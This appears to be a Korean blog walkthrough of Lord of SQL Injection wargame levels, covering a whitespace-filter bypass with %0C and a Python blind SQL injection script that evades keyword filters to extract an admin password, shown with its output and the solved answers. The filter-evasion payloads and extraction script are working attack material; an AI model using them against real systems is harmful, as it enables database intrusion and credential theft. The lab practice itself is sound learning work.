TUTOR 리덕토의 배움세상

이번에 우리가 공략할 몬스터는 거인이다. 이 커다란 문제를 해결하기 위해서는 이전에 배웠던 내용을 잘 생각해야 된다.

코드

응? 일단 쿼리가 1234를 가져오도록 했다.;; 공백과 개행과 캐리지 리턴, 탭은 막힌 상황이고, 우리의 입력값이 빈칸으로 인식되는 무엇인가가 되면 좋을 거 같다.

해결방안

Answer Url : los.rubiya.kr/chall/XXXX.php?shit=%0C

기억할지 모르겠지만, 공백을 우회하는 여러 가지 문자열이 있었다. 기억 안 나면 아래 포스팅을 공부하고 오자

2021.04.13 - [정보보안-실습/SQL Injection] - [LOSI] Lord of SQL Injection Level 5 - Wolfman

의외로 미적지근하게 해결할 수 있었다. 다음에는 둔한 몬스터 말고 조금 날렵한 몬스터를 만나보자.

12번까지 열심히 올리고 한숨 자고 오니까 머리가 맑아진 기분이다. 역시 잠과 퇴근은 사랑이다. 개인적으로 몰라서 그런데 bugbear가 한국말로 뭐지? 바로 문제로 넘어가자

* 이 문제를 해결하기 위한 코드는 python으로 작성되어있습니다. *

* 작성된 blind sql injection 코드에 대한 해설은 4번 orc에 자세하게 나와있습니다. *

2021.04.13 - [정보보안-실습/SQL Injection] - [LOSI] Lord of SQL Injection Level 4 - Orc

코드

이번 금지된 문자열은 다음과 같다.

_,., \, ', substr, ascii, =, or, and. space(공백), like, 0x 

아주 다채롭게도 막아놓았다. 정확한 pw를 구한다는 점과 먼저 hello admin이 출력된다는 점에서 blind sql injectino을 통한 공략이 가능할 거 같다. 

해결방법

Answer Url : los.rubiya.kr/chall/XXXX.php?pw=52dc3991

import string
from requests import get

if __name__ == "__main__" :
    url = ### BUGBEAR url ###
    cookie = dict(PHPSESSID = "### 자기의 PHPSESSID ###")
    length = 0
    password = ""
    letters = string.digits + string.ascii_letters

    print("### find length of pw ###")

    while(True) :
        param = "?no=12351235%09||length(pw)%09in("+str(length)+")--%20;"
        new_url = url+param
        rec = get(new_url,cookies=cookie)

        if(rec.text.find("Hello admin")>=0 ):
            print("find length of pw : "+str(length))
            break
        print(str(length)+" is wrong length")
        length+=1

    print("\n\n### find for pw ###")
    for i in range(1,length+1) :
        for a in letters :
            param = "?no=1234566%09||%09id%09in(%22admin%22)%09%26%26%09left(pw,"+str(i)+")%09in(%22"+(password+a)+"%22)--%20;"
            new_url = url+param

            rec = get(new_url,cookies=cookie)

            if(rec.text.find("Hello admin")>=0) :
                print("find for "+str(i)+"'s pw : "+a)
                password += a
                break

    print("finally found pw : "+password)
        

치환된 항목는 다음과 같으며, 출력은 아래와 같다.

공백 >> TAB(%09)

or >> 파이프(||)

and >> &&

등호 or like >> in(in 명령어는 항목이 in()의 파라미터 있으면 참이다.)

substr >> left를 이용한(기존에 구한 password에 검사할 문자열을 더해서 반복한다.)

### find length of pw ###
0 is wrong length
1 is wrong length
2 is wrong length
3 is wrong length
4 is wrong length
5 is wrong length
6 is wrong length
7 is wrong length
find length of pw : 8


### find for pw ###
find for 1's pw : 5
find for 2's pw : 2
find for 3's pw : d
find for 4's pw : c
find for 5's pw : 3
find for 6's pw : 9
find for 7's pw : 9
find for 8's pw : 1
finally find pw : 52dc3991

BugBear를 퇴치한 걸 축하한다.

여태까지 물리친 몬스터들의 공략법을 기억했다면, in을 사용하는 것 말고는 새로운 방법이 없었던 bugbear였다. 다음 관문에서 여러분들을 기다리겠다.